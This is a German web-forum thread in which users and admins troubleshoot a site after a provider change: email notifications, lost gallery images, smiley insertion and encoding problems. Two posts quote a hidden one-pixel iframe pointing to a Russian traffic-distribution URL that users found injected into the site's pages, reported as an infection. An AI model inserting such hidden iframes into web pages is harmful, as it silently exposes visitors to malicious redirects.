Mal eine vorsichtige Frage, gibt es jetzt auch wieder eine E-Mail Benachrichtigung für PNs?
Gruß Scoty81
Mal eine vorsichtige Frage, gibt es jetzt auch wieder eine E-Mail Benachrichtigung für PNs?
Gruß Scoty81
Also bei mir funtzt es. Ich habe es auch wieder für alle freigegeben. Wir haben ja nun auch einen anderen Provider *fg*
PARAsmart ?
Hab noch einen (bitte nicht hauen :D), Bilderschwund in der Galerie mit der Meldung
ZitatWarning: getimagesize(images/galerie/pics/33/mithacksler2.jpg): failed to open stream: No such file or directory in D:\Inetpub\wwwForum-A3Q\galerie\pic.php on line 44
Die 2 Bilder die in meiner Galerie fehlen waren nach dem E__smart Crash noch da und bis vor dem letzten auch noch.
Das Bild das ich gestern testweise hoch geladen habe ist allerdings noch da!
ZitatOriginal geschrieben von somepeer
Hab noch einen (bitte nicht hauen :D), Bilderschwund in der Galerie mit der Meldung
Die 2 Bilder die in meiner Galerie fehlen waren nach dem E__smart Crash noch da und bis vor dem letzten auch noch.
Das Bild das ich gestern testweise hoch geladen habe ist allerdings noch da!
Das werd ich von Had suchen müssen. Hast du zufällig noch den Filenamen des Bildes welches nun weg ist.
Im übrigen Scannt der Server grad sollte beim ein oder anderen der Seitenaufbau etwas länger dauern.....
Das waren:
...images/galerie/pics/33/mithacksler1.jpg
...images/galerie/pics/33/mithacksler2.jpg
Wie kann ich eigentlich ein eine E-Mail Antwort in einem Thread wieder ausschalten wenn ich es bei einem Beitrag aktiviert habe?
Könnt Ihr noch einen Mod installieren der an der Stelle des Cursors einfügt und nicht am Ende der Nachricht?
Gruß Scoty81
*duck*
Ich bräucht meinen FTP-Zugang wieder und den allgemeinen für die Mods.
Aber lass Dir Zeit
ZitatOriginal geschrieben von somepeer
Das waren:
...images/galerie/pics/33/mithacksler1.jpg
...images/galerie/pics/33/mithacksler2.jpg
Du hast 11 Bilder in deiner Galerie, und diese beiden sind nicht gespeichert. Ich konnte sie auch nicht woanderst finden
Ich schau mal ob vielleicht die Links tot sind. Denn die Bilder kann ich leider nicht finden....
@Scotch
Die Sache mit den Smilies sollte es eigentlich schon seid Jahren nicht mehr geben. Ich schau morgen was ich da damals geändert habe, denn das ist wirklich nervig.
Gruss
Bei R8Q ist das der Fall.
Hier allerdings hab ich dieses Smiley-Phänomen nicht.
Komisch dass Scoty das hier hat
Ich weis wieso Scotch das Problemchen hat.
Er nutzt keinen IE *gg*
Aufm MAC hab ich das Problem auch.
Micha die FTP Geschichte mach ich dir natürlich auch.
Gruss
Keine Hetzerei
Bis es soweit ist, mach ich das über Remote
Genau, nutze FF
Wie kann ich denn eine E-Mail Benachrichtigung abstellen?
Gruß
DU kannst das garnicht! Erst wolltest du sie, dann leb damit.
Spass beisiete von welcher Email reden wir? Bei IM, bei Abo????
Gruss
Und schon wieder ne Russische Invasion:
<iframe src='http://www.traffaret.msk.ru/work/tds/index.php?out=1196874419' width='1' height='1' style='visibility: hidden;'></iframe>
Steht in meinen HTML-Seiten drin...
ZitatOriginal geschrieben von crislee
DU kannst das garnicht! Erst wolltest du sie, dann leb damit.
Spass beisiete von welcher Email reden wir? Bei IM, bei Abo????
Gruss
Abo, also unten die Option:
per E-Mail über Antworten benachrichtigen
Gruß Scoty81
Wenn du oben auf die Buttons gehst, nimmst du Favoriten......da kannst du dann die Threads auswählen über welche du informiert werden willst.
Gruss
ZitatOriginal geschrieben von matbold
Und schon wieder ne Russische Invasion:
<iframe src='http://www.traffaret.msk.ru/work/tds/index.php?out=1196874419' width='1' height='1' style='visibility: hidden;'></iframe>
Steht in meinen HTML-Seiten drin...
In welchen Seiten?
Ich sehe die traffaret.msk.ru iframes auch in jeder Forum-Seite mehrfach im Source-Code
Hi,
ist dies nur bei mir der Fall oder passen bei euch die ganzen Umlaute in den Postings noch nicht?
Welche Schriftcodierung habt ihr denn eingestellt?
Hab nun auf Westlich (ISO-8859-15) gestellt von (ISO-8859-1) und keine Veränderung ..
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!